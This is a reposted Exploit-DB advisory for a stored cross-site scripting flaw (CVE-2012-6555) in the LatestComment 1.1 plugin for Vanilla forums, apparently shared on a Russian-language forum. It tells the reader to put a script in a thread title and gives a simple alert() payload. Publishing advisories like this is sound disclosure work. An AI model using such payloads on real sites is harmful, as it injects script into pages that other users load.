- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 18908
- Проверка EDB
-
- Пройдено
- Автор
- HENRY HOGGARD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2012-6555
- Дата публикации
- 2012-05-18
Код:
# Title: Vanilla LatestComment 1.1 Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + Latest Comment 1.1
#http://vanillaforums.org/addon/latestcomment-plugin
# http://vanillaforums.org
#############################################################
Create a new thread with your XSS as the thread title, the XSS will appear on the index page of the forum.
XSS:
<script>alert('x')</script>
#############################################################
http://henryhoggard.co.uk- Источник
- www.exploit-db.com
